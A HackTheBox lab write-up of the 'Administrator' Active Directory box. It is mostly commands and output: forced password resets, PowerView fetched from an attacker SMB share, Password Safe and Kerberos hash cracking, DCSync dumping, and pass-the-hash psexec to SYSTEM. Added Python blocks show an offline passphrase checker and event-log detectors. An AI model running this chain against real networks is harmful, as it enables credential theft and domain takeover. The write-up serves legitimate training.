AD · Medium · Windows

HTB — Administrator

FTP credentials from initial account. Targeted Kerberoasting via BloodHound paths, GenericWrite abuse, DCSync for Domain Admin hash.

January 8, 2025 · HackTheBox
#AD #Kerberoasting #BloodHound #DCSync

Machine Information: As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia, Password: ichliebedich

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.42

Nmap scan report for 10.10.11.42
Host is up (0.027s latency).
Not shown: 62876 closed tcp ports (reset), 2633 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-08 04:12:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
53348/tcp open  msrpc         Microsoft Windows RPC
56941/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
56946/tcp open  msrpc         Microsoft Windows RPC
56953/tcp open  msrpc         Microsoft Windows RPC
56958/tcp open  msrpc         Microsoft Windows RPC
56971/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/7%OT=21%CT=1%CU=40000%PV=Y%DS=2%DC=T%G=Y%TM=677D9
OS:8E5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=105%TI=I%CI=I%TS=A)SEQ(SP
OS:=102%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=102%GCD=2%ISR=105%TI=
OS:I%CI=I%II=I%SS=S%TS=A)SEQ(SP=103%GCD=1%ISR=106%TI=I%CI=RD%II=I%SS=S%TS=A
OS:)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53
OS:CNW8ST11%O6=M53CST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC
OS:)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-08T04:13:05
|_  start_date: N/A
|_clock-skew: 7h00m01s

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   28.52 ms 10.10.14.1
2   28.98 ms 10.10.11.42
```

21/tcp open ftp

```sh
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
```

445/tcp open microsoft-ds?

```sh
445/tcp   open  microsoft-ds?
```

```sh
smbclient -L \\\\10.10.11.42 -U dministrator.htb/Olivia
Password for [DMINISTRATOR.HTB\Olivia]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

evil-winrm

```sh
nxc winrm 10.10.11.42 -u olivia -p 'ichliebedich'
WINRM       10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\olivia:ichliebedich (Pwn3d!)
```

kerberoasting

```sh
GetUserSPNs.py -dc-ip 10.10.11.42 administrator.htb/olivia
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

Password:
No entries found!
```

asreproasting

```sh
GetNPUsers.py administrator.htb/olivia -dc-ip 10.10.11.42
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

Password:
No entries found!
```

bloodhound

```sh
sudo bloodhound-python -u 'olivia' -p 'ichliebedich' -ns 10.10.11.42 -d administrator.htb -c all
zip -r administrator_htb.zip *.json
```

```sh
sudo neo4j console
sudo bloodhound
```

GenericAll

```powershell
$SecPassword = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\olivia', $SecPassword)
```

transfer PowerView.ps1

```sh
sudo impacket-smbserver share -smb2support ./
```

```powershell
*Evil-WinRM* PS C:\Users\olivia> copy \\10.10.14.21\share\PowerView.ps1 .\
```

```powershell
Set-ExecutionPolicy Bypass -Scope Process
```

```powershell
Import-Module .\PowerView.ps1
```

Force Change Password michael

```powershell
$SecPassword = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\olivia', $SecPassword)
```

```powershell
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
```

```powershell
Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword -Credential $Cred
```

```sh
*Evil-WinRM* PS C:\Users\olivia> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            alexander                benjamin
emily                    emma                     ethan
Guest                    krbtgt                   michael
olivia
The command completed with one or more errors.
```

```sh
nxc smb 10.10.11.42 -u 'michael' -p 'Password123!'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\michael:Password123!
```

ForceChangePassword Benjamin

```powershell
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\michael', $SecPassword)
```

```powershell
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
```

```powershell
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $Cred
```

```sh
nxc smb 10.10.11.42 -u 'benjamin' -p 'Password123!'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\benjamin:Password123! 
```

ftp

  • benjamin's new password also works for the FTP service

```sh
ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||54242|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
```

```sh
ftp> passive
```

```sh
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
```

```sh
ftp> get Backup.psafe3
```

```sh
file Backup.psafe3
Backup.psafe3: Password Safe V3 database
```

Password Safe

  • download https://github.com/pwsafe/pwsafe/releases?q=non-windows&expanded=true

```sh
apt --fix-broken install
sudo dpkg -i passwordsafe-debian12-1.20-amd64.deb
```

```sh
pwsafe Backup.psafe3
```

pwsafe2john

```sh
pwsafe2john Backup.psafe3 > Backup.hash
```

john

```sh
john --wordlist=/usr/share/wordlists/rockyou.txt Backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 SSE2 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)
```
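Why john can attack the file offline: a Password Safe V3 header stores the salt, the iteration count and a SHA-256 of the stretched key, so any candidate passphrase can be verified without decrypting a single record. The following is an added example (not from the original post or the pwsafe project) that rebuilds that check against a constructed header using the same iteration count john reported above.

```python
import hashlib
import struct

# Layout of the first 72 bytes of a Password Safe V3 file (the part pwsafe2john extracts):
#   "PWS3" | SALT (32 bytes) | ITER (uint32 little-endian) | H(P') (32 bytes)
# P' is the stretched key; only H(P') is stored, which is enough to verify a guess.
HEADER_LEN = 72

def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """P' = SHA-256 applied ITER more times to SHA-256(passphrase || salt)."""
    x = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x

def build_header(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Construct a V3 header for a known passphrase (used here only to create the sample)."""
    key_hash = hashlib.sha256(stretch_key(passphrase, salt, iterations)).digest()
    return b"PWS3" + salt + struct.pack("<I", iterations) + key_hash

def parse_header(data: bytes):
    """Return (salt, iterations, stored H(P')) or raise if this is not a PWS3 file."""
    if len(data) < HEADER_LEN or data[:4] != b"PWS3":
        raise ValueError("not a Password Safe V3 database")
    salt = data[4:36]
    iterations = struct.unpack("<I", data[36:40])[0]
    return salt, iterations, data[40:72]

def check_passphrase(data: bytes, candidate: bytes) -> bool:
    """Offline verification: recompute H(P') for the candidate and compare."""
    salt, iterations, key_hash = parse_header(data)
    return hashlib.sha256(stretch_key(candidate, salt, iterations)).digest() == key_hash

def wordlist_attack(data: bytes, words):
    """First word that verifies, or None; each guess costs ITER + 2 SHA-256 calls."""
    for w in words:
        if check_passphrase(data, w):
            return w.decode()
    return None

# Constructed sample database header with the iteration count john reported (2048).
SAMPLE_SALT = bytes(range(32))
SAMPLE_DB = build_header(b"tekieromucho", SAMPLE_SALT, 2048)
```

The iteration count is the only cost factor, so a weak passphrase with the default count falls to rockyou in seconds; pwsafe lets the owner raise it, and a passphrase outside common wordlists is the real defence.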

```txt
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
```

```sh
nxc smb 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 
```

```sh
evil-winrm -i 10.10.11.42 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
```

user.txt

```sh
*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
815395ec...
```

GenericWrite ethan

```sh
evil-winrm 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
```

```powershell
$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)
```

```powershell
Set-DomainObject -Credential $Cred -Identity ethan -SET @{serviceprincipalname='nonexistent/TEST'}
```

```sh
*Evil-WinRM* PS C:\Users\emily> copy \\10.10.14.21\share\PowerView.ps1
```

```powershell
Set-ExecutionPolicy Bypass -Scope Process
```

pywhisker

No need to run pywhisker: a targeted Kerberoast can be done directly from the Windows side over evil-winrm.

```sh
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
pip3 install -r requirements.txt
pip3 install .
```

```sh
pywhisker -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --target ethan --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: c5272a60-654f-9d95-6082-fd0dda878bde
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: ITe8YivF.pfx
[*] Must be used with password: hxtWhRZgbVvmBSE7tixd
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```

PKINITtools

https://github.com/dirkjanm/PKINITtools

```sh
git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos
```

```sh
impacket-GetUserSPNs -dc-ip 10.10.11.42 administrator.htb/emily -request-user ethan 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name   MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  -----  --------  --------------------------  ---------  ----------
nonexistent/TEST      ethan            2024-10-12 16:52:14.117811  <never>               



[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
```

targetedKerberoast

```sh
sudo ntpdate 10.10.11.42 & python3 /opt/linux/targetedKerberoast.py -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[1] 19953
2025-01-08 18:19:07.343806 (-0500) +25202.559618 +/- 0.007379 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25202.559618
[1]  + done       sudo ntpdate 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$d646939b...
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$467aad6d...
```

```txt
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$467aad6d...
```

```sh
hashcat -m 13100 ethan_tgs.txt /usr/share/wordlists/rockyou.txt


$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$467aad6d...:limpbizkit
```
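From the blue-team side, the GenericWrite step and the roast leave two Security-log artifacts that are easy to correlate: a 5136 directory-modification event adding a servicePrincipalName, followed shortly by a 4769 service-ticket request with RC4 (etype 0x17) for a user account, both tied to the same principal. The following is an added example (not from the original post or any of the tools used in it) that runs that correlation over constructed event records.

```python
from datetime import datetime, timedelta

# Constructed Security-log records in the shape of the two relevant event IDs:
# 5136 (directory service object modified) and 4769 (Kerberos service ticket requested).
# OperationType %%14674 means "Value Added"; TicketEncryptionType 0x17 is RC4-HMAC.
EVENTS = [
    {"EventID": 5136, "Time": "2025-01-08T18:10:00", "SubjectUserName": "emily",
     "ObjectDN": "CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "nonexistent/TEST", "OperationType": "%%14674"},
    {"EventID": 4769, "Time": "2025-01-08T18:19:07", "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "Time": "2025-01-08T18:20:00", "TargetUserName": "DC$@ADMINISTRATOR.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "Time": "2025-01-08T09:00:00", "TargetUserName": "olivia@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17", "Status": "0x0"},  # predates the write
]

def spn_writes(events):
    """5136 events that add a servicePrincipalName value to some object."""
    return [e for e in events if e["EventID"] == 5136
            and e["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
            and e["OperationType"] == "%%14674"]

def rc4_user_tgs(events):
    """4769 events requesting an RC4 service ticket for a user (not machine or krbtgt) account."""
    return [e for e in events if e["EventID"] == 4769
            and e["TicketEncryptionType"].lower() == "0x17"
            and not e["ServiceName"].endswith("$")
            and e["ServiceName"].lower() != "krbtgt"]

def detect_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Correlate: the same principal writes an SPN, then pulls an RC4 TGS within the window."""
    alerts = []
    for w in spn_writes(events):
        writer = w["SubjectUserName"].lower()
        t_write = datetime.fromisoformat(w["Time"])
        for t in rc4_user_tgs(events):
            requester = t["TargetUserName"].split("@")[0].lower()
            delta = datetime.fromisoformat(t["Time"]) - t_write
            if requester == writer and timedelta(0) <= delta <= window:
                alerts.append({"actor": writer, "object": w["ObjectDN"],
                               "spn": w["AttributeValue"], "roasted": t["ServiceName"]})
    return alerts
```

Auditing 5136 requires a SACL on the user objects; the 4769 half alone is noisy, which is why the join on actor and time window matters.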

ethan:limpbizkit

```sh
nxc smb 10.10.11.42 -u 'ethan' -p 'limpbizkit'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\ethan:limpbizkit 
```

```sh
secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@'10.10.11.42'
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435...:3dc553ce...:::
Guest:501:aad3b435...:31d6cfe0...:::
krbtgt:502:aad3b435...:1181ba47...:::
administrator.htb\olivia:1108:aad3b435...:fbaa3e22...:::
administrator.htb\michael:1109:aad3b435...:2b576acb...:::
administrator.htb\benjamin:1110:aad3b435...:2b576acb...:::
administrator.htb\emily:1112:aad3b435...:eb200a25...:::
administrator.htb\ethan:1113:aad3b435...:5c2b9f97...:::
administrator.htb\alexander:3601:aad3b435...:cdc9e5f3...:::
administrator.htb\emma:3602:aad3b435...:11ecd72c...:::
DC$:1000:aad3b435...:cf411dda...:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a...
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e0...
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec16...
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:7a206ee05e894781b99a0175a7fe6f7e1242913b2ab72d0a797cc45968451142
administrator.htb\michael:aes128-cts-hmac-sha1-96:b0f3074a...
administrator.htb\michael:des-cbc-md5:2586dc58c47c61f7
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:36cfe045bc49eda752ca34dd62d77285b82b8c8180c3846a09e4cb13468433a9
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:2cca9575...
administrator.htb\benjamin:des-cbc-md5:49376b671fadf4d6
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e...
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744...
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386...
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed62...
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a476...
DC$:des-cbc-md5:f483547c4325492a
```
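The DRSUAPI method secretsdump reports above is a DCSync: it works because ethan holds the replication extended rights on the domain object, and exercising them from a user account is the detection hook. The following is an added example (not from the original post or Impacket) that flags Security event 4662 records where a non-DC principal exercises the DS-Replication-Get-Changes rights, over constructed records.

```python
import re

# Well-known control-access-right GUIDs that DRSUAPI replication requires on the domain object.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Constructed 4662 ("An operation was performed on an object") records with the fields the
# rule needs. AccessMask 0x100 is "control access"; %%7688 is the resource string for it.
EVENTS_4662 = [
    {"SubjectUserName": "ethan", "AccessMask": "0x100",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",   # domainDNS class
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "DC$", "AccessMask": "0x100",           # a real DC replicating: expected
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "emily", "AccessMask": "0x10",          # ordinary attribute read, benign
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "%%7684 {bf967a0a-0de6-11d0-a285-00aa003049e2}"},
]

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)

def requested_rights(event):
    """Set of GUIDs listed in the event's Properties field, lower-cased for comparison."""
    return {g.lower() for g in GUID_RE.findall(event["Properties"])}

def is_dc_account(name, dc_accounts):
    return name.lower() in {d.lower() for d in dc_accounts}

def detect_dcsync(events, dc_accounts=("DC$",)):
    """Replication rights exercised by anything other than a known DC computer account."""
    alerts = []
    for e in events:
        if e["AccessMask"].lower() != "0x100":
            continue
        rights = requested_rights(e) & REPLICATION_RIGHTS
        if rights and not is_dc_account(e["SubjectUserName"], dc_accounts):
            alerts.append((e["SubjectUserName"], sorted(rights)))
    return alerts
```

The allow-list of DC accounts must also cover legitimate replication tools such as Entra Connect service accounts, otherwise the rule will page on every sync cycle.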
```sh
impacket-psexec administrator@10.10.11.42 -hashes :3dc553ce...

Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.11.42.....
[*] Found writable share ADMIN$
[*] Uploading file HskZdNDB.exe
[*] Opening SVCManager on 10.10.11.42.....
[*] Creating service vpsi on 10.10.11.42.....
[*] Starting service vpsi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

root.txt

```cmd
C:\Users\Administrator\Desktop> type root.txt
551d2d31...
```